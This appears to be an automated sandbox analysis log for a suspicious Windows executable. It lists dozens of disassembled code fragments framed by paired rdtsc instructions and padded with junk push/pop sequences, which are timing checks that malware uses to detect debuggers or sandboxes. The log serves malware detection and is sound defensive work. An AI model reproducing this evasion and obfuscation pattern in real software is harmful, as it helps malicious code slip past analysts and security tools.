                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A57289 second address: A572B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A575DE second address: A575E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A575E4 second address: A575E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A57696 second address: A576C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3D4D8210Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push edi 0x00000010 jmp 00007FA3D4D8210Eh 0x00000015 pop edi 0x00000016 pop edi 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A576C7 second address: A576CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A576CB second address: A576FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007FA3D4D82112h 0x00000011 pop eax 0x00000012 and ch, FFFFFFB9h 0x00000015 mov edi, eax 0x00000017 push 8DD05BBCh 0x0000001c pushad 0x0000001d jbe 00007FA3D4D8210Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A576FC second address: A57703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A578EC second address: A57912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FA3D4D82106h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A57B1F second address: A57B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A57B23 second address: A57B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A57B29 second address: A57B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnc 00007FA3D4C68E56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov cx, F61Bh 0x00000015 push 00000004h 0x00000017 mov di, D68Bh 0x0000001b nop 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A57B4A second address: A57B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A57B4E second address: A57B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A58046 second address: A5804C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A581EB second address: A58205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA3D4C68E61h 0x0000000f jmp 00007FA3D4C68E5Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9371D second address: A9374E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FA3D4D8210Ch 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FA3D4D82119h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A938F6 second address: A938FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9642A second address: A96438 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A96438 second address: A9643E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9643E second address: A96442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A1368A second address: A13690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A13690 second address: A13694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A13694 second address: A136C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3D4C68E56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3D4C68E64h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A136C4 second address: A136C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A136C8 second address: A136E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA3D4C68E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FA3D4C68E5Ch 0x00000015 jne 00007FA3D4C68E56h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9914B second address: A99150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A992D0 second address: A992D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A992D6 second address: A992DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9FD2D second address: A9FD33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9FD33 second address: A9FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9FD39 second address: A9FD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9FE68 second address: A9FEAD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jmp 00007FA3D4D82114h 0x00000015 popad 0x00000016 jne 00007FA3D4D82128h 0x0000001c push edi 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007FA3D4D82110h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA0007 second address: AA0018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4C68E5Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA0018 second address: AA001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA0182 second address: AA0193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007FA3D4C68E5Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA0193 second address: AA0198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA0198 second address: AA01A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA02CA second address: AA02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA02DA second address: AA02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA3D4C68E56h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA288F second address: AA28B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D82119h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA28B2 second address: AA28B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA667B second address: AA6680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA6680 second address: AA6687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA6687 second address: AA668D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA668D second address: AA669D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FA3D4C68E56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C04 second address: AA5C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C08 second address: AA5C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C25 second address: AA5C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4D82114h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C3D second address: AA5C4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5D95 second address: AA5D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA607A second address: AA607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA607E second address: AA60A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 jne 00007FA3D4D82106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA9127 second address: AA9131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA3D4C68E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA9131 second address: AA913F instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA913F second address: AA9148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA9148 second address: AA914E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA914E second address: AA9159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB2189 second address: AB218F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB218F second address: AB2193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0385 second address: AB038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB038B second address: AB038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0696 second address: AB069C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB069C second address: AB06BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Eh 0x00000007 jmp 00007FA3D4C68E61h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB06BF second address: AB06CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB06CF second address: AB06D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB06D5 second address: AB06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0D79 second address: AB0D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0D7F second address: AB0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA3D4D82106h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB18DC second address: AB1926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f popad 0x00000010 jmp 00007FA3D4C68E63h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA3D4C68E5Fh 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB1926 second address: AB192E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB192E second address: AB1937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB1937 second address: AB193D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5DF8 second address: AB5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5DFE second address: AB5E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5A05 second address: AB5A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5A0B second address: AB5A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B2D second address: AC2B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA3D4C68E56h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B3A second address: AC2B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FA3D4D82106h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B53 second address: AC2B5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B5D second address: AC2B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC106A second address: AC106E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC106E second address: AC1082 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA3D4D82106h 0x0000000e jp 00007FA3D4D82106h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1507 second address: AC152E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FA3D4C68E62h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC152E second address: AC1550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82117h 0x00000007 pushad 0x00000008 jno 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC17E6 second address: AC1804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E67h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1804 second address: AC1834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D82113h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA3D4D8213Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FA3D4D82106h 0x0000001c jg 00007FA3D4D82106h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1834 second address: AC1854 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 jmp 00007FA3D4C68E63h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC19A4 second address: AC19B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B23 second address: AC1B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B27 second address: AC1B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jc 00007FA3D4D82106h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B37 second address: AC1B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FA3D4C68E56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B44 second address: AC1B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnc 00007FA3D4D82112h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FA3D4D82106h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC223F second address: AC2255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2255 second address: AC225F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
